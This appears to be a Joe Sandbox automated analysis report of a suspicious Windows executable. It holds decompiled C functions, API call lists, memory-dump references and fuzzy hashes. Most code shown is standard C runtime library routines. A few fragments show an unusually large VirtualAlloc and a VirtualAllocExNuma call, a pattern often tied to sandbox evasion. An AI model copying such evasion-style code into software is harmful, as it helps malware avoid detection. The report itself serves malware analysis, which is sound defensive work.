                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: __lock_file_memset
                            • String ID:
                            • API String ID: 26237723-0
                            • Opcode ID: 5eaf20c378e7fe892fb4ba95427a176efef7e25f7920ef86b53747a22fcb4caa
                            • Instruction ID: 2af45227eed5edb4438e39e35216454ea520485be8ab08fad039e629539767aa
                            • Opcode Fuzzy Hash: 5eaf20c378e7fe892fb4ba95427a176efef7e25f7920ef86b53747a22fcb4caa
                            • Instruction Fuzzy Hash: 65014871C0022AEBDF22BFA88D0089F3F31BF24768F008225F928551A0DB758662DFD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 02B1310A: GetSystemInfo.KERNELBASE(?), ref: 02B13127
                            • VirtualAllocExNuma.KERNELBASE(00000000), ref: 02B131CD
                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID: AllocInfoNumaSystemVirtual
                            • String ID:
                            • API String ID: 449148690-0
                            • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                            • Instruction ID: f97c37d9629cb800a12ee9c44a5288f14f2ffa69a6790a0b156b9828f4d60d9a
                            • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                            • Instruction Fuzzy Hash: AFF090B0D5031DBBEF007BF48C09B6DBAB9DF41701F9049E0AF44B6188EBB446948E66
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 362 1321649-132165f call 1321585
                            C-Code - Quality: 25%
                            			E01321649(intOrPtr _a4, intOrPtr _a8) {
                            				void* __ebp;
                            				void* _t3;
                            				void* _t4;
                            				void* _t5;
                            				void* _t6;
                            				void* _t7;
                            				void* _t10;
                            
                            				_push(0x40);
                            				_push(_a8);
                            				_push(_a4);
                            				_t3 = E01321585(_t4, _t5, _t6, _t7, _t10); // executed
                            				return _t3;
                            			}











                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: __fsopen
                            • String ID:
                            • API String ID: 3646066109-0
                            • Opcode ID: b5f1e3f8c0985568a2b975540194b91a49099896255c8aa19d8b1f82aed34cac
                            • Instruction ID: 32f4b7221d19f7ef7cccc9e9931c12cfe9d0171bd5ab38159ba4ec818a1325d2
                            • Opcode Fuzzy Hash: b5f1e3f8c0985568a2b975540194b91a49099896255c8aa19d8b1f82aed34cac
                            • Instruction Fuzzy Hash: E9C09B7244010C77CF112986EC01E453F1A97D0664F154050FB1C191609573D5619585
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 365 132504d-132504f call 1324fdb 367 1325054-1325055 365->367
                            C-Code - Quality: 100%
                            			E0132504D() {
                            				void* _t1;
                            
                            				_t1 = E01324FDB(0); // executed
                            				return _t1;
                            			}




                            0x0132504f
                            0x01325055

                            APIs
                            • __encode_pointer.LIBCMT ref: 0132504F
                              • Part of subcall function 01324FDB: TlsGetValue.KERNEL32(00000000,?,01325054,00000000,013260A6,013302A0,00000000,00000314,?,01323123,013302A0,Microsoft Visual C++ Runtime Library,00012010), ref: 01324FED
                              • Part of subcall function 01324FDB: TlsGetValue.KERNEL32(00000005,?,01325054,00000000,013260A6,013302A0,00000000,00000314,?,01323123,013302A0,Microsoft Visual C++ Runtime Library,00012010), ref: 01325004
                              • Part of subcall function 01324FDB: RtlEncodePointer.NTDLL(00000000,?,01325054,00000000,013260A6,013302A0,00000000,00000314,?,01323123,013302A0,Microsoft Visual C++ Runtime Library,00012010), ref: 01325042
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: Value$EncodePointer__encode_pointer
                            • String ID:
                            • API String ID: 2585649348-0
                            • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                            • Instruction ID: 78c1fb375e5c35cb987ad136fe676cd8c0ce8df1eb9ba6ee01c8bdd99c6c0f08
                            • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                            • Instruction Fuzzy Hash:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 425 2b1306a-2b130b1 call 2b1298f call 2b129a3 * 2 VirtualAlloc 432 2b130b3-2b130b6 425->432 433 2b130b8-2b130c0 425->433 432->433 434 2b130c2-2b130cf 433->434 435 2b13105-2b13109 433->435 436 2b130d2-2b130d6 434->436 437 2b130d8-2b130ec 436->437 438 2b130ee-2b130ff 436->438 437->436 438->435
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 02B130A7
                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                            • Instruction ID: d0d625c787dd10289690e87b7c21846a087c8abca8fed40a03c71129daa5cb1a
                            • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                            • Instruction Fuzzy Hash: 4B110670D00218AFDB00EBA8CC49BAEBBF5EB04304FA084E5E945F7290D3714A44CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E01325B55(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                            				intOrPtr _v0;
                            				void* _v804;
                            				intOrPtr _v808;
                            				intOrPtr _v812;
                            				intOrPtr _t6;
                            				intOrPtr _t11;
                            				intOrPtr _t12;
                            				intOrPtr _t13;
                            				long _t17;
                            				intOrPtr _t21;
                            				intOrPtr _t22;
                            				intOrPtr _t25;
                            				intOrPtr _t26;
                            				intOrPtr _t27;
                            				intOrPtr* _t31;
                            				void* _t34;
                            
                            				_t27 = __esi;
                            				_t26 = __edi;
                            				_t25 = __edx;
                            				_t22 = __ecx;
                            				_t21 = __ebx;
                            				_t6 = __eax;
                            				_t34 = _t22 -  *0x132f5d8; // 0xc4da7b5e
                            				if(_t34 == 0) {
                            					asm("repe ret");
                            				}
                            				 *0x1330878 = _t6;
                            				 *0x1330874 = _t22;
                            				 *0x1330870 = _t25;
                            				 *0x133086c = _t21;
                            				 *0x1330868 = _t27;
                            				 *0x1330864 = _t26;
                            				 *0x1330890 = ss;
                            				 *0x1330884 = cs;
                            				 *0x1330860 = ds;
                            				 *0x133085c = es;
                            				 *0x1330858 = fs;
                            				 *0x1330854 = gs;
                            				asm("pushfd");
                            				_pop( *0x1330888);
                            				 *0x133087c =  *_t31;
                            				 *0x1330880 = _v0;
                            				 *0x133088c =  &_a4;
                            				 *0x13307c8 = 0x10001;
                            				_t11 =  *0x1330880; // 0x0
                            				 *0x133077c = _t11;
                            				 *0x1330770 = 0xc0000409;
                            				 *0x1330774 = 1;
                            				_t12 =  *0x132f5d8; // 0xc4da7b5e
                            				_v812 = _t12;
                            				_t13 =  *0x132f5dc; // 0x3b2584a1
                            				_v808 = _t13;
                            				 *0x13307c0 = IsDebuggerPresent();
                            				_push(1);
                            				E01327168(_t14);
                            				SetUnhandledExceptionFilter(0);
                            				_t17 = UnhandledExceptionFilter(0x132ca38);
                            				if( *0x13307c0 == 0) {
                            					_push(1);
                            					E01327168(_t17);
                            				}
                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                            			}




















                            APIs
                            • IsDebuggerPresent.KERNEL32 ref: 0132952B
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01329540
                            • UnhandledExceptionFilter.KERNEL32(0132CA38), ref: 0132954B
                            • GetCurrentProcess.KERNEL32(C0000409), ref: 01329567
                            • TerminateProcess.KERNEL32(00000000), ref: 0132956E
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                            • String ID:
                            • API String ID: 2579439406-0
                            • Opcode ID: dc96b0040fa0f0c9fad60ba0d7235aa29d4ae7318c37b4e58f64ef8a376baa9d
                            • Instruction ID: fd63e98e6d297a92027ca4b481c7d7d551dc6c967760522bfe12cd789a5f2b6e
                            • Opcode Fuzzy Hash: dc96b0040fa0f0c9fad60ba0d7235aa29d4ae7318c37b4e58f64ef8a376baa9d
                            • Instruction Fuzzy Hash: AF21BFB4801218DFD779EF69E4466583BECFB08B45F60501AF5098B348E7B4A981CF89
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01324954() {
                            
                            				SetUnhandledExceptionFilter(E01324912);
                            				return 0;
                            			}




                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(Function_00004912), ref: 01324959
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: b80f08af4eda5e0d5d839e525ca09242781d8fb5c476e47bc1d65edbb43a7bb5
                            • Instruction ID: 2a138580942b227d0fc1e0d469d4f49f6eb92877b4ac9c2b0e182974de1e1ee6
                            • Opcode Fuzzy Hash: b80f08af4eda5e0d5d839e525ca09242781d8fb5c476e47bc1d65edbb43a7bb5
                            • Instruction Fuzzy Hash: A19002B036111046DA243B71580B60925985E48E56B52546CE205D8108DA9451406A51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                            • Instruction ID: 8a9c0e4c2540879810bc0d0875f1eb3e17d96f734ee34198fe7c183291557bc9
                            • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                            • Instruction Fuzzy Hash: CC11C232610129AFD720DF79C8809AAB7E8EF546A47808065FC55CB200E334DD41C7A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                            • Instruction ID: ab313be9f3194a6e86e31eba2fb00cce8c763d97d8fc4f0d41ecb8fe604ae42a
                            • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                            • Instruction Fuzzy Hash: 86E01A35664659AFEB54CBA8CD81D6AB3F8EB0D320B5442D0FD25C73A0E734EE00DA50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                            • Instruction ID: d452b8ae916db5cdd30fca7de91e48b1b57fc66bcd78766fe60a32c56154ad66
                            • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                            • Instruction Fuzzy Hash: ECE086332305609FD7319B59D900D96F7E9EF88BB0B8988A5ED5997660D330FC00CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                            • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                            • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                            • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01321000(void* __ebx, void* __ecx, void* __edi, void* __esi, WCHAR* _a4, WCHAR* _a8, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20) {
                            				intOrPtr _v8;
                            
                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a20 == 0) {
                            					return 0x57;
                            				} else {
                            					_v8 = E0132141A(_a4, 0x5c);
                            					if(_v8 == 0) {
                            						_v8 = E01321559(_a4, 0x40);
                            						if(_v8 == 0) {
                            							if(lstrlenW(_a4) <= _a12 - 1) {
                            								lstrcpyW(_a8, _a4);
                            								 *_a16 = 0;
                            								return 0;
                            							}
                            							return 0x7a;
                            						}
                            						if(_v8 + 2 - _a4 >> 1 <= _a12 - 1) {
                            							if(lstrlenW(_v8 + 2) <= _a20 - 1) {
                            								lstrcpyW(_a16, _v8 + 2);
                            								E01327760(__ebx, __edi, __esi, _a8, _a4, _v8 - _a4 >> 1 << 1);
                            								_a8[_v8 - _a4 >> 1] = 0;
                            								return 0;
                            							}
                            							return 0x7a;
                            						}
                            						return 0x7a;
                            					}
                            					if(_v8 - _a4 >> 1 <= _a20 - 1) {
                            						if(lstrlenW(_v8 + 2) <= _a12 - 1) {
                            							lstrcpyW(_a8, _v8 + 2);
                            							E01327760(__ebx, __edi, __esi, _a16, _a4, _v8 - _a4 >> 1 << 1);
                            							_a16[_v8 - _a4 >> 1] = 0;
                            							return 0;
                            						}
                            						return 0x7a;
                            					}
                            					return 0x7a;
                            				}
                            			}





                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: lstrcpylstrlen$_wcschr_wcsrchr
                            • String ID:
                            • API String ID: 2287690931-0
                            • Opcode ID: c269b97b9905f15a49733a8c35e577445ffbc74541814b88d2834e78245f9eb7
                            • Instruction ID: ef007f0316f0161483825e7800360616755226c5e25d87c88738d12933986736
                            • Opcode Fuzzy Hash: c269b97b9905f15a49733a8c35e577445ffbc74541814b88d2834e78245f9eb7
                            • Instruction Fuzzy Hash: 30516371A00118EFCB24EF6CCA84BAE77B9EF84345F14C618F91A97344D634EA50CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 45%
                            			E0132567D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                            				intOrPtr* _t10;
                            				intOrPtr _t13;
                            				intOrPtr _t24;
                            				void* _t26;
                            
                            				_push(0xc);
                            				_push(0x132d5f8);
                            				_t8 = E01322A5C(__ebx, __edi, __esi);
                            				_t24 =  *((intOrPtr*)(_t26 + 8));
                            				if(_t24 == 0) {
                            					L9:
                            					return E01322AA1(_t8);
                            				}
                            				if( *0x1331cbc != 3) {
                            					_push(_t24);
                            					L7:
                            					_t8 = HeapFree( *0x1330264, 0, ??);
                            					_t32 = _t8;
                            					if(_t8 == 0) {
                            						_t10 = E013231DA(_t32);
                            						 *_t10 = E01323198(GetLastError());
                            					}
                            					goto L9;
                            				}
                            				E01321F64(__ebx, __edx, __edi, 4);
                            				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
                            				_t13 = E01321F97(_t24);
                            				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
                            				if(_t13 != 0) {
                            					_push(_t24);
                            					_push(_t13);
                            					E01321FC7();
                            				}
                            				 *(_t26 - 4) = 0xfffffffe;
                            				_t8 = E013256D3();
                            				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
                            					goto L9;
                            				} else {
                            					_push( *((intOrPtr*)(_t26 + 8)));
                            					goto L7;
                            				}
                            			}








                            APIs
                            • __lock.LIBCMT ref: 0132569B
                              • Part of subcall function 01321F64: __mtinitlocknum.LIBCMT ref: 01321F7A
                              • Part of subcall function 01321F64: __amsg_exit.LIBCMT ref: 01321F86
                              • Part of subcall function 01321F64: EnterCriticalSection.KERNEL32(0132122A,0132122A,?,0132904E,00000004,0132D7E0,0000000C,01325766,?,01321239,00000000,00000000,00000000,?,01325254,00000001), ref: 01321F8E
                            • ___sbh_find_block.LIBCMT ref: 013256A6
                            • ___sbh_free_block.LIBCMT ref: 013256B5
                            • HeapFree.KERNEL32(00000000,?,0132D5F8,0000000C,01321F45,00000000,0132D4A0,0000000C,01321F7F,?,0132122A,?,0132904E,00000004,0132D7E0,0000000C), ref: 013256E5
                            • GetLastError.KERNEL32(?,0132904E,00000004,0132D7E0,0000000C,01325766,?,01321239,00000000,00000000,00000000,?,01325254,00000001,00000214), ref: 013256F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                            • String ID: Uhv
                            • API String ID: 2714421763-4282624479
                            • Opcode ID: 3359487bdfba264b96f7fd2c8edc14d3dc2089593cca1d619f8ec75c3573d693
                            • Instruction ID: dd4315922994e3233120f3946ed9c20b540e9c94b40c428a95199ed5241f7cb0
                            • Opcode Fuzzy Hash: 3359487bdfba264b96f7fd2c8edc14d3dc2089593cca1d619f8ec75c3573d693
                            • Instruction Fuzzy Hash: C3016771945336EAEB307F799C05B9E3BB8AF11768F205508E510A6080DB38D6408B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			E013287EB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                            				signed int _t15;
                            				LONG* _t21;
                            				long _t23;
                            				void* _t29;
                            				void* _t31;
                            				LONG* _t33;
                            				void* _t34;
                            				void* _t35;
                            
                            				_t35 = __eflags;
                            				_t29 = __edx;
                            				_t25 = __ebx;
                            				_push(0xc);
                            				_push(0x132d780);
                            				E01322A5C(__ebx, __edi, __esi);
                            				_t31 = E013252A2(__ebx, _t35);
                            				_t15 =  *0x132fd9c; // 0xfffffffe
                            				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                            					E01321F64(_t25, _t29, _t31, 0xd);
                            					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                            					_t33 =  *(_t31 + 0x68);
                            					 *(_t34 - 0x1c) = _t33;
                            					__eflags = _t33 -  *0x132fba8; // 0x2b11610
                            					if(__eflags != 0) {
                            						__eflags = _t33;
                            						if(_t33 != 0) {
                            							_t23 = InterlockedDecrement(_t33);
                            							__eflags = _t23;
                            							if(_t23 == 0) {
                            								__eflags = _t33 - 0x132f780;
                            								if(__eflags != 0) {
                            									_push(_t33);
                            									E0132567D(_t25, _t29, _t31, _t33, __eflags);
                            								}
                            							}
                            						}
                            						_t21 =  *0x132fba8; // 0x2b11610
                            						 *(_t31 + 0x68) = _t21;
                            						_t33 =  *0x132fba8; // 0x2b11610
                            						 *(_t34 - 0x1c) = _t33;
                            						InterlockedIncrement(_t33);
                            					}
                            					 *(_t34 - 4) = 0xfffffffe;
                            					E01328886();
                            				} else {
                            					_t33 =  *(_t31 + 0x68);
                            				}
                            				if(_t33 == 0) {
                            					E01322CAC(_t29, 0x20);
                            				}
                            				return E01322AA1(_t33);
                            			}












                            APIs
                            • __getptd.LIBCMT ref: 013287F7
                              • Part of subcall function 013252A2: __getptd_noexit.LIBCMT ref: 013252A5
                              • Part of subcall function 013252A2: __amsg_exit.LIBCMT ref: 013252B2
                            • __amsg_exit.LIBCMT ref: 01328817
                            • __lock.LIBCMT ref: 01328827
                            • InterlockedDecrement.KERNEL32(?), ref: 01328844
                            • InterlockedIncrement.KERNEL32(02B11610), ref: 0132886F
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                            • String ID:
                            • API String ID: 4271482742-0
                            • Opcode ID: 9b991770f953512e2b516849efd538229dc8a10faf15c4d8451a18d4ed7c61a7
                            • Instruction ID: 494ec1cdcd8f8986daad00a11c73874ee2ecdee88d868881a6432ae855148e52
                            • Opcode Fuzzy Hash: 9b991770f953512e2b516849efd538229dc8a10faf15c4d8451a18d4ed7c61a7
                            • Instruction Fuzzy Hash: 70018031901632ABEB31BFADB404B5E7FF8BF05B28F154159E910A7684CB78A941CBD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01329F35(void* __edx, void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                            				char _v8;
                            				signed int _v12;
                            				char _v20;
                            				char _t43;
                            				char _t46;
                            				signed int _t53;
                            				signed int _t54;
                            				intOrPtr _t56;
                            				intOrPtr _t57;
                            				int _t58;
                            				signed short* _t59;
                            				short* _t60;
                            				int _t65;
                            				char* _t74;
                            
                            				_t74 = _a8;
                            				if(_t74 == 0 || _a12 == 0) {
                            					L5:
                            					return 0;
                            				} else {
                            					if( *_t74 != 0) {
                            						E01326D18( &_v20, __edx, __edi, _a16);
                            						_t43 = _v20;
                            						__eflags =  *(_t43 + 0x14);
                            						if( *(_t43 + 0x14) != 0) {
                            							_t46 = E0132A066( *_t74 & 0x000000ff,  &_v20);
                            							__eflags = _t46;
                            							if(_t46 == 0) {
                            								__eflags = _a4;
                            								_t40 = _v20 + 4; // 0x840ffff8
                            								__eflags = MultiByteToWideChar( *_t40, 9, _t74, 1, _a4, 0 | _a4 != 0x00000000);
                            								if(__eflags != 0) {
                            									L10:
                            									__eflags = _v8;
                            									if(_v8 != 0) {
                            										_t53 = _v12;
                            										_t11 = _t53 + 0x70;
                            										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                            										__eflags =  *_t11;
                            									}
                            									return 1;
                            								}
                            								L21:
                            								_t54 = E013231DA(__eflags);
                            								 *_t54 = 0x2a;
                            								__eflags = _v8;
                            								if(_v8 != 0) {
                            									_t54 = _v12;
                            									_t33 = _t54 + 0x70;
                            									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                            									__eflags =  *_t33;
                            								}
                            								return _t54 | 0xffffffff;
                            							}
                            							_t56 = _v20;
                            							_t15 = _t56 + 0xac; // 0x75ff5003
                            							_t65 =  *_t15;
                            							__eflags = _t65 - 1;
                            							if(_t65 <= 1) {
                            								L17:
                            								_t24 = _t56 + 0xac; // 0x75ff5003
                            								__eflags = _a12 -  *_t24;
                            								if(__eflags < 0) {
                            									goto L21;
                            								}
                            								__eflags = _t74[1];
                            								if(__eflags == 0) {
                            									goto L21;
                            								}
                            								L19:
                            								_t26 = _t56 + 0xac; // 0x75ff5003
                            								_t57 =  *_t26;
                            								__eflags = _v8;
                            								if(_v8 == 0) {
                            									return _t57;
                            								}
                            								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                            								return _t57;
                            							}
                            							__eflags = _a12 - _t65;
                            							if(_a12 < _t65) {
                            								goto L17;
                            							}
                            							__eflags = _a4;
                            							_t21 = _t56 + 4; // 0x840ffff8
                            							_t58 = MultiByteToWideChar( *_t21, 9, _t74, _t65, _a4, 0 | _a4 != 0x00000000);
                            							__eflags = _t58;
                            							_t56 = _v20;
                            							if(_t58 != 0) {
                            								goto L19;
                            							}
                            							goto L17;
                            						}
                            						_t59 = _a4;
                            						__eflags = _t59;
                            						if(_t59 != 0) {
                            							 *_t59 =  *_t74 & 0x000000ff;
                            						}
                            						goto L10;
                            					} else {
                            						_t60 = _a4;
                            						if(_t60 != 0) {
                            							 *_t60 = 0;
                            						}
                            						goto L5;
                            					}
                            				}
                            			}


















                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 01329F69
                            • __isleadbyte_l.LIBCMT ref: 01329F9D
                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,75FF5003,00BFBBEF,00000000,?,?,?,01326B14,00000109,00BFBBEF,00000003), ref: 01329FCE
                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,01326B14,00000109,00BFBBEF,00000003), ref: 0132A03C
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
